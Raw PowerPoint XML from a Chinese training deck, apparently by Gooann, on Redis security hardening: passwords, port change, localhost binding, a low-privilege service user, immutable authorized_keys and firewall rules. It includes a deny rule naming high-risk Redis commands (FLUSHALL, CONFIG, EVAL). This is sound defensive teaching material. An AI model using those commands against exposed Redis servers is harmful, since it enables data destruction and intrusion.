            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>redis.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中添加配置（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Requirepass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）或是命令设置（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>CONFIG set password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>），由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>性能极高，输入错误密码后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>不会进行主动延迟，所以攻击者可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>秒内尝试十几万密码的穷举破解，所以建议密码复杂度和长度一定要高。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>更改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>默认端口</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>redis.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中配置如下</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>#port 6379 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Port 8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（此端口可根据业务自定进行修改）</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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>安全配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145438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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库</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知识子域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695400" y="1628800"/>
            <a:ext cx="10972800" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>禁止外网访问 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的默认配置会接受来自任何地址发送来的请求，即在任何一个拥有公网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的服务器上启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务器，都可以被外界直接访问到。要更改这一设置，在配置文件中修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>参数，如只允许本机应用连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，可以将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>参数改成：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>bind 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>以低权限运行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务创建单独的用户和家目录，并且配置禁止登陆</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>groupadd -r redis &amp;&amp; useradd -r -g redis redis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>禁止高危命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>redis.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>文件中添加</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>rename-command FLUSHALL “”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>rename-command CONFIG “”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>rename-command EVAL ""</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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>安全配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108446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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库</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知识子域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695400" y="1628800"/>
            <a:ext cx="10972800" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>保证 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>文件的安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的权限设置为对拥有者只读，其他用户没有任何权限：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> 400 ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>为保证 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的权限不会被改掉，还需要设置该文件的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>immutable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>位权限：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>chattr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>然而，用户还可以重命名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，然后新建新的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>目录和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>authorized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>文件。要避免这种情况，需要设置 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>~./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>immutable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>位权限：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>chattr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在系统中设置防火墙策略仅允许指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>来访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务</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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>安全配置</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4274804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7826" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119336" y="5572125"/>
            <a:ext cx="48974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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R"/>
                <a:ea typeface="Adobe 黑体 Std R"/>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>北京谷安天下科技有限公司</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Adobe 黑体 Std R"/>
              <a:ea typeface="Adobe 黑体 Std R"/>
              <a:cs typeface="Adobe 黑体 Std R"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R"/>
                <a:ea typeface="Adobe 黑体 Std R"/>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>谷安天下公司主页：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R"/>
                <a:ea typeface="Adobe 黑体 Std R"/>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>www.gooann.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R"/>
                <a:ea typeface="Adobe 黑体 Std R"/>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>谷安培训教育网页：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R"/>
                <a:ea typeface="Adobe 黑体 Std R"/>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>http://px.gooann.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R"/>
                <a:ea typeface="Adobe 黑体 Std R"/>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>安全意识产品网页：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R"/>
                <a:ea typeface="Adobe 黑体 Std R"/>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>http://sectv.gooann.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R"/>
                <a:ea typeface="Adobe 黑体 Std R"/>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>产品解决方案网页：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R"/>
                <a:ea typeface="Adobe 黑体 Std R"/>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>http://product.gooann.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R"/>
                <a:ea typeface="Adobe 黑体 Std R"/>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>谷安信息安全商城：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Adobe 黑体 Std R"/>
                <a:ea typeface="Adobe 黑体 Std R"/>
                <a:cs typeface="Adobe 黑体 Std R"/>
              </a:rPr>
              <a:t>http://gooannpx.taobao.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Adobe 黑体 Std R"/>
              <a:ea typeface="Adobe 黑体 Std R"/>
              <a:cs typeface="Adobe 黑体 Std R"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2782888" y="2133600"/>
            <a:ext cx="6909264" cy="1446550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
